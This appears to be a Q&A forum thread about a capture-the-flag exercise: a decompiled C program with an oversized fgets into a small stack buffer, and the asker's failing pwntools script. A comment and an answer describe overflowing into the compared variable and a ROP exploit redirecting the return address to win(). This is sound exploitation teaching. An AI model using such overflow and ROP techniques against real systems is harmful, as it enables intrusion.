2

My goal is to buffer-overflow a binary written in C. That binary asks me to input a name.
After having opened the binary with Ghidra, I discovered the following code that should help me to build an exploit :

undefined8_8 main(void)

    {
      int iVar10;
      char local_99 [106];
      undefined4 local_j;
      undefined2 local_gg;
      
      setvbuf(stdin,(char *)0x0,2,0);
      setvbuf(stdout,(char *)0x0,2,0);
      setvbuf(stderr,(char *)0x0,2,0);
      local_j = 0x64726570;
      local_gg = 0x73;
      puts(&DAT_00102008);
      fgets(local_99,0x100,stdin);
      iVar10 = strcmp((char *)&local_j,"gagne");
      if (iVar10 == 0) {
        win(local_99);
      }
      else {
        puts("Bad try, try again");
      }
      return 0;
    }

I see the line iVar10 = strcmp((char *)&local_j,"gagne"); that should help. I guess this line compares the local_j variable to the string "gagne" but I'm not really sure. What's more, local_j variable (0x64726570) corresponds to the string "perd" after little-endian transformation.
Anyway if I pass the test, I think I could buffer-overflow the binary and maybe get my flag.
The thing I don't get is how to hack the equality in my payload ?

Here is a script I tried to build but it does obviously not work and don't have any other ideas :

#!/usr/bin/env python
from pwn import *

con = remote("IP", Port) 

data_ = con.recv(4096)
print(data_.decode())

payload = b"gagne" + p64(0x64726570)+b"\n" 

print("payload to send =>",payload)

con.send(payload) 

con.interactive()

Have you got some ideas ?
Any help would be greatly appreciated, thanks !

Improve this question
1
  • Try to use a payload with some dummy data to fill local_99 and overflow "gagne" into local_j and local_gg. Commented May 15, 2024 at 13:08

1 Answer 1

Reset to default
0

You didn't mention the binary mitigations in place, but assuming that PIE and the stack canary are disabled, you can simply overwrite the saved return address with the address of win. The catch is that you might need to set up the arguments before jumping to win, but you can use pwntools to do that for you. Here's an example exploit:

from pwn import *

bin = "./a.out"
elf = ELF(bin)
rop = ROP(elf)
io = process(bin)
context.update(binary=elf.path, encoding='latin-1')

OFFSET = 136 # change this to your saved rip offset
io.clean()
rop.win("some_text") # we call the win function with the arg "some_text"
io.fit({OFFSET: rop.chain()}) # this will generate and send our payload
io.interactive()
Improve this answer
Sign up to request clarification or add additional context in comments.

Comments

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.